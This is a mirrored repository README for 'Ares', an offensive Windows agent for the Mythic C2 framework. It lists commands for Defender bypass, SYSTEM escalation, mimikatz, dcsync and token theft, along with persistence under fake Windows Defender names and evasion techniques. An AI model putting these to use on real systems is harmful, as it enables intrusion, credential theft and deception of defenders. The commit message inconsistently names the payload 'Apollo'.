aryma/Ares-mythic
1
0
Fork 0
mirror of https://github.com/Aryma-f4/Ares-mythic.git synced 2026-06-12 16:24:12 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
6321bfc31b1e659a6b1558762dd9ffdecefc1eb1
Ares-mythic/README.md
Aryma 224a0013d7 feat: add Ares payload type with agent code and documentation 
This commit introduces the Apollo payload type for Mythic C2, including:
- Complete .NET agent codebase with modular architecture
- Multiple C2 profile implementations (HTTP, SMB, TCP, WebSocket)
- Extensive documentation with command references and MITRE ATT&CK mappings
- Agent utilities including UAC bypasses, injection techniques, and crypto modules
- Configuration files for build systems and development environments
- Sample binaries and resources for agent functionality

The Apollo agent provides Windows post-exploitation capabilities with a focus on modularity and extensibility, supporting various communication methods and injection techniques.
2026-04-14 12:27:18 +07:00

306 lines
8.6 KiB
Markdown
Raw Blame History

# Ares - Advanced Windows Agent
![Ares](documentation-payload/ares/AresLandscape.svg)
Ares is a sophisticated Windows agent designed for advanced red team operations, integrating BlueHammer exploit capabilities with Mythic C2 framework for comprehensive penetration testing and security assessment.
## 🚀 Overview
Ares combines the power of the BlueHammer Windows Defender exploit with a robust Mythic C2 integration, providing:
- Windows Defender bypass capabilities
- SYSTEM privilege escalation
- Multiple persistence mechanisms
- Full Mythic C2 integration
- Advanced evasion techniques
## 📋 Features
### Core Capabilities
- **Windows Defender Bypass**: Leverages BlueHammer exploit to disable security controls
- **SYSTEM Privileges**: Multiple techniques for privilege escalation to NT AUTHORITY\SYSTEM
- **Persistence**: Comprehensive persistence across registry, services, tasks, and startup
- **Mythic C2 Integration**: Full command and control capabilities
- **Encrypted Communication**: AES256 encryption with HMAC integrity
### Advanced Features
- **P2P Communication**: Peer-to-peer agent communication
- **Credential Operations**: Credential tracking and manipulation
- **Code Execution**: Unmanaged PE, .NET Assembly, and PowerShell execution
- **SOCKSv5 Support**: Proxy capabilities for network operations
- **Domain Rotation**: Advanced HTTP profile with proxy support
- **Message Transform**: Base64, NetBIOS, XOR encoding support
## 🛠️ Installation
### Prerequisites
- Mythic C2 server installed on a remote computer
- Windows target systems for deployment
- Python 3.8+ for agent building
### Installation from Mythic
As **root** user:
```bash
./mythic-cli install github https://github.com/MythicAgents/Ares.git
```
As **non-root** user:
```bash
sudo -E ./mythic-cli install github https://github.com/MythicAgents/Ares.git
```
Once installed, restart Mythic to build the agent.
### Manual Building
1. **Clone the repository**:
```bash
git clone https://github.com/MythicAgents/Ares.git
cd Ares
```
2. **Build the agent**:
```bash
python build.py
```
3. **Deploy the agent**:
```bash
python deploy.py
```
## ⚙️ Configuration
### C2 Profile Configuration
Ares supports advanced HTTP profile configuration:
```json
{
"c2_profile": "http",
"callback_host": "http://your-c2-server.com",
"callback_port": 80,
"callback_interval": 10,
"callback_jitter": 23,
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
},
"AESPSK": {
"enc_key": "your-encryption-key",
"dec_key": "your-decryption-key",
"value": "aes256_hmac"
}
}
```
### Build Parameters
```json
{
"output_type": "WinExe",
"filename": "win-update.exe",
"debug": true,
"shellcode_bypass": "Continue on fail",
"enable_keying": false
}
```
## 🎯 Usage
### Agent Execution
Execute the agent on target systems:
```cmd
win-update.exe
```
### Command Examples
#### Windows Defender Bypass
```bash
bypass_defender
```
#### Privilege Escalation
```bash
getsystem
```
#### Persistence Establishment
```bash
establish_persistence
```
#### File Operations
```bash
# Download file
download -Path C:\sensitive\file.txt
# Upload file
upload -File local_file.txt -RemotePath C:\temp\file.txt
```
#### Code Execution
```bash
# Execute .NET assembly
execute_assembly -Assembly malware.exe -Arguments "-flag value"
# Execute PowerShell
powershell -Command "Get-Process"
# Execute COFF object file
execute_coff -Coff object.x64.o -Function go
```
## 🔧 Commands Reference
### Core Commands
| Command | Syntax | Description |
|---------|--------|-------------|
| `bypass_defender` | `bypass_defender` | Bypass Windows Defender using BlueHammer exploit |
| `getsystem` | `getsystem` | Gain SYSTEM privileges using multiple techniques |
| `establish_persistence` | `establish_persistence` | Establish multiple persistence mechanisms |
| `assembly_inject` | `assembly_inject -PID [pid] -Assembly [assembly]` | Execute .NET assembly in remote process |
| `execute_assembly` | `execute_assembly -Assembly [assembly.exe]` | Execute registered .NET assembly |
| `execute_pe` | `execute_pe -PE [binary.exe]` | Execute statically compiled executable |
### File Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `download` | `download -Path [path]` | Download file from target system |
| `upload` | `upload -File [file] -RemotePath [path]` | Upload file to target system |
| `cat` | `cat -Path [file]` | Display file contents |
| `cp` | `cp -Path [source] -Destination [dest]` | Copy file |
| `mv` | `mv -Path [source] -Destination [dest]` | Move file |
| `rm` | `rm -Path [file]` | Remove file |
### System Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `shell` | `shell -Command "command"` | Execute shell command |
| `ps` | `ps` | List processes |
| `kill` | `kill -PID [pid]` | Kill process |
| `ls` | `ls -Path [dir]` | List directory contents |
| `cd` | `cd -Path [dir]` | Change directory |
| `pwd` | `pwd` | Print working directory |
### Network Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `ifconfig` | `ifconfig` | Get network adapters |
| `netstat` | `netstat` | Display network connections |
| `net_dclist` | `net_dclist` | List domain controllers |
| `net_shares` | `net_shares` | List network shares |
### Credential Operations
| Command | Syntax | Description |
|---------|--------|-------------|
| `mimikatz` | `mimikatz -Command "command"` | Execute Mimikatz commands |
| `dcsync` | `dcsync -Domain [domain]` | DCSync domain credentials |
| `make_token` | `make_token -Domain [domain] -User [user] -Password [pass]` | Create access token |
| `steal_token` | `steal_token -PID [pid]` | Steal token from process |
## 🛡️ Persistence Mechanisms
### Registry Persistence
- **HKCU**: `Software\Microsoft\Windows\CurrentVersion\Run`
- **HKLM**: `Software\Microsoft\Windows\CurrentVersion\Run`
### Service Persistence
- **Service Name**: `WinDefendUpdate`
- **Run As**: `LocalSystem`
- **Startup Type**: Automatic
### Scheduled Tasks
- **Task Name**: `WindowsDefenderMaintenance`
- **Schedule**: Hourly
- **Run As**: `SYSTEM`
### Startup Folder
- **Location**: `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`
- **File Name**: `WindowsDefenderUpdate.exe`
## 🔒 Security Features
### Encryption
- **AES256-CBC**: End-to-end encryption
- **HMAC-SHA256**: Message integrity verification
- **Key Rotation**: Configurable key rotation policies
### Evasion Techniques
- **Process Hollowing**: Advanced code injection
- **API Unhooking**: Bypass security hooks
- **Direct Syscalls**: Bypass user-mode hooks
- **Stack Spoofing**: Evade stack-based detection
## 📊 Mythic Integration
### C2 Communication
- **Check-in Interval**: Configurable (default: 10 seconds)
- **Jitter**: Percentage-based jitter (default: 23%)
- **Encryption**: AES256 with HMAC integrity
- **Proxy Support**: HTTP proxies and domain fronting
### Task Processing
- **Asynchronous Processing**: Non-blocking task execution
- **Result Reporting**: Comprehensive result reporting
- **Error Handling**: Robust error handling and recovery
- **Status Updates**: Real-time task status updates
## 🚨 Detection Evasion
Ares employs multiple techniques to evade detection:
### Behavioral Evasion
- Legitimate process names
- Windows Defender-related service names
- Temp directory operation
- Fileless execution where possible
### Technical Evasion
- API unhooking
- Direct system calls
- Stack spoofing
- Process hollowing
- ETW patching
## ⚠️ Disclaimer
This tool is intended for:
- Authorized penetration testing
- Security research and education
- Red team operations with proper authorization
**Unauthorized use against systems you do not own or have explicit permission to test is illegal.**
## 🐛 Issues and Support
Report issues and feature requests:
- GitHub Issues: https://github.com/MythicAgents/Ares/issues
- Documentation: https://github.com/MythicAgents/Ares/wiki
- Community Support: Mythic Discord server
## 📄 License
This project is licensed under the MIT License. See the LICENSE file for details.
## 🙏 Credits
- **BlueHammer Researchers**: For the Windows Defender exploit
- **Mythic C2 Team**: For the excellent C2 framework
- **Security Researchers**: For ongoing research and techniques
- **Red Team Community**: For testing and feedback
## 🔗 Resources
- [Mythic C2 Documentation](https://github.com/its-a-feature/Mythic/)
- [BlueHammer Research](https://github.com/bluehammer)
- [Windows Security Research](https://github.com/topics/windows-security)
---
**Ares Team** | Advanced Red Team Operations | 2026
Reference in New Issue View Git Blame Copy Permalink